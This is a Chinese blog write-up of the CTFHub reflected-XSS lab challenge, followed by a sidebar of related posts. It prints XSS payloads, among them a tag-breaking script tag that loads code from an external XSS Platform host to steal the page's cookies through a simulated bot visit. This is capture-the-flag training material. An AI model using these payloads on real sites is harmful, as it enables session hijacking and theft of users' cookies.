CTFHub | 反射型

最新推荐文章于 2024-04-11 16:47:57 发布
最新推荐文章于 2024-04-11 16:47:57 发布
阅读量352 收藏
点赞数 2
分类专栏: CTF精进之路 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51191308/article/details/133799363
版权

0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

反射型:

        (无)

 网页显示内容

        

        

0x02 解题过程

检查网页显示内容发现有一个输入框以及一个提交表单。可以在这个输入框中输入你的名字并提交。第二个输入框是发送构造好的 XSS 链接给机器人模拟执行。一般情况下,在一个网页中有一个输入框并且带有一个提交表单的,就有可能含有 XSS 漏洞。

        

直接使用 scripts 标签写入一个警告弹窗,警告内容自定义。

<script>alert("flag")</script>

        

点击提交表单按钮,发现成功跳出警告弹窗,说明此题存在 XSS 漏洞。

        

验证存在 XSS 漏洞后,使用 document.cookie 语句在弹窗和控制台中输出当前网页包含的所有 cookie 。

<script>alert(document.cookie);console.log(document.cookie);</script>

        

点击提交后,弹窗显示为空。检查网页源代码发现 script 标签被正常执行到 html 页面中。

<div>
    <h1>Hello, <script>alert(document.cookie);console.log(document.cookie);</script>
    </h1>
</div>

        

这说明 XSS 攻击通常需要使用一个服务器去接收参数,那么这里使用 XSS Platform 平台来接收。根据提示,将第一行代码植入到怀疑出现 xss 的地方(注意'的转义)。

</textarea>'"><script src=http://xxx.xxx.xxx.xxx/Q7yYOv?1702702862></script>

关于 XSS Platform 平台搭建的方法: 保姆级 | XSS Platform环境搭建-CSDN博客

         

在第一行输入框中使用 XSS Platform 平台中的代码,先执行 XSS 漏洞攻击。

        

第二个输入框则是用了模拟目标网站用户模拟点击受污染的 URL 链接,如果点击了这个链接,那么刚刚注入的 XSS 代码将会被执行并传递到本地服务器中。

        

访问 XSS Platform 平台,检查 cookie 参数是否传递到本地服务器中。检查发现此题 flag 。

        

        

0x03 XSS反射型

XSS反射型攻击流程图

        

        XSS反射型攻击一般伪装成合法的 URL 链接诱导用户点击。点击后,这个网页的 XSS 漏洞将会被执行,而恶意代码将会在用户的浏览器中执行,并返回参数给攻击者的服务器。关于 XSS 反射型攻击也类似于钓鱼攻击,因为攻击者一般会伪装成可信的实体来欺骗用户。

        

        

0x04 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

尼泊罗河伯
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
反射TFT-LCD
07-11
TFT-LCD的厚度和重量制约了它的更广泛应用,例如,它不符合便携式应用领域的要求。
反射xss攻击流量数据包
07-18
反射xss攻击流量数据包
CTFHUB-WEB-XSS-反射
weixin_43486981的博客
08-13 3804
CTFHUB-WEB-XSS-反射知识点:跨站脚本攻击XSS题目XSS platform平台 知识点:跨站脚本攻击XSS XSS允许恶意web用户将代码植入到提供给其它用户使用的页面中。 特点:能注入恶意的HTML/JavaScript代码到用户浏览器网址上,从而劫持会话 类: DOM。属于反射的一种,利用非法输入来闭合对应的html标签。数据流向是URL→浏览器。 存储。危害大。相关源代码存放于服务器,用户浏览该页面时触发代码执行。 反射。需要攻击者提前构造一个恶意链接来诱使客户点击。 防
CTFHUB——反射XSS详解
wuuconix's blog
09-01 7664
背景 本来看ctfhub上有xss的题目,打算好好学习一波,结果点开一看,只有一道题2333。 便现在dvwa上熟悉了一波。所谓反射是相对于存储来讲的。 如果黑客的xss注入是通过某种方式储存到了数据库中,那就是存储的,这种xss的特点就是每次访问该页面都会收到xss攻击,因为js语句已经放在数据库里了。 而反射xss则不是这样,每次触发只能手动输入和点击才能触发。 我认为xss产生的原因主要是对便签审查不严格造成的。 dvwa xss例题 下面写一下dvwa中的三种难度的反射xss。 <?
xss跨站攻击脚本概述
xu_1234567的博客
10-28 326
1.XSS 漏洞简介 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 xss攻击分为三类: (1)持久跨站(存储xss ):最直接的危害类,跨站代码存储在服务器(数据库) (2)非持久跨站(反射xss):反射跨站脚本漏洞,最普
CTFHub | web—XSS(反射
2301_76435948的博客
09-27 437
XSS反射:URL地址当中的恶意参数直接被输出到页面中,导致攻击代码被触发。
CTFHUB-技能树-Web题-XSS-反射
最新发布
Static______的博客
04-11 1379
参考链接:https://blog.csdn.net/weixin_43486981/article/details/107974878。特点:能注入恶意的HTML/JavaScript代码到用户浏览器网址上,从而劫持会话。输入admin后,会在页面显示,猜测可以通过该输入,改变页面内容。根据提示,把XSS平台给出的代码复制到第一个输入框中进行注入。提交后,在第二个框中访问第一个框注入XSS脚本后的网址。XSS platform平台,在上面注册一个账号。提交后,在XSS平台查看注入结果。
反射LED灯优于传统卤钨灯
10-19
测试结果显示,大部分反射自镇流LED灯的光效指标较以往已有了很大程度的提升,达到了60lm/W左右的水平,与传统卤钨反射灯相比,提高3倍左右,两种灯的光通维持率在燃点4000小时时相差不大,但灯的光通维持率变化...
CD33漫反射操作说明书中文版.pdf
06-04
CD33漫反射操作说明书中文版.pdf
Spring Framework反射文件下载漏洞
05-08
在Spring Framework版本5.2.0-5.2.8、5.1.0-5.1.17、5.0.0-5.0.18、4.3.0-4.3.28和更旧的不受支持版本中,可能会绕过CVE-2015-5211对RFD攻击的保护,具体取决于通过使用jsessionid路径参数使用的浏览器。
CTFHub-Web-反射XSS
qq_54037445的博客
11-28 481
CTFHub-Web-反射XSS XSS平台
CTFHub】xss——反射
用博客做做记录的小白
07-10 240
CTFHub靶场的xss反射练习
[ctfhub]-xss详解
weixin_52116519的博客
04-28 4945
1、明确cookie的作用 当你登录账号密码,服务端就会给你一个cookie,这样你在这个平台上的操作就带上了cookie来验证身份,而不用每一次操作都要你登录账号密码。cookie相当于每个人的登录凭证,如果得到了别人的cookie,特别是管理员的,我们将可以不用输账号密码,直接登录,从而获取管理员权限。 2、XSS的目的 获取别人的cookie。 Web渗透测试之XSS攻击:反射XSS 获得cookie的方法:我们在有XSS漏洞的搜索栏中输入<script>alert(document.c
题解记录-CTFHub技能树|Web|XSS,文件上传
weixin_57448435的博客
09-15 782
xss平台使用,修改后缀名、文件头、双写绕过,%00截断,.htaccess文件理解,bp与蚁剑工具的使用
CTFHub】XSS漏洞_反射
Mitchell_Donovan的博客
04-20 1005
CTFHub_反射XSS 原题链接 key:反射XSS的注入与利用 ①原题界面如下???? 简单地尝试一下有无反射XSS漏洞,在第一个框内提交以下XSS弹窗语句???? <script>alert(1)</script> 发现成功弹窗,说明存在XSS漏洞 ②登陆平台XSSplatform,创建新项目???? 进行相关配置???? ③查看项目代码???? 这都不重要,在底部找到使用方法???? ④把其中一条攻击代码复制下
CTFHub | DOM反射
尼泊罗河伯的博客
01-31 535
查看网页内容发现一个输入框和一个提交表单。第二个输入框用于模拟用户点击访问目标网页的一个过程。
CTFhub 反射
plant1234的博客
06-05 410
反射: 根据题目启动环境: 得到: 首先在第一个框中能进行无过滤的xss代码注入, 在第二个框可以进行访问url地址 更具大佬博客:https://blog.csdn.net/weixin_43486981/article/details/107974878 发现,中题的基本思路是在第一个框进行playload插入,在第二个访问插入的playload代码, 看大佬的博客发现,提供xss注入代码的平台:xsscom.com//index.php?do=login 进入平台,注册用户,创建一个简单的xss进
CTFHubWeb>XSS(反射)
Ynh323的博客
05-11 558
ctfhub平台,xss反射详解
CTFHub技能树web之XSS
wzhwzh123321的博客
02-26 1352
在XSS系列的题目中,由于需要使用能够接受XSS数据的平台,并且由于使用的是CTFHub的模拟机器人点击我们的虚假URL,因此使用的XSS平台不能是自己本地搭建的,如果是本地的模拟点击的机器人将无法访问我们给的这个URL地址,也就无法接收到我们想要的数据了,因此想解决本系列的题目,可以通过在线XSS平台或者自己使用服务器搭建一个XSS平台。可以看到可控的位置在53-55行中的这个位置,先闭合前面的单引号和<script>,然后再用一个<script>输入XSS代码,构造语句如下';第三题: DOM反射
ctfhub技能树xss
07-28
2. XSS攻击类:学习常见的XSS攻击类,包括反射、存储和DOMXSS。 3. XSS攻击场景:了解XSS攻击在不同的Web应用场景中的实践方法,如评论框、搜索框等。 4. XSS防御措施:学习如何预防和防御XSS攻击,包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼泊罗河伯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值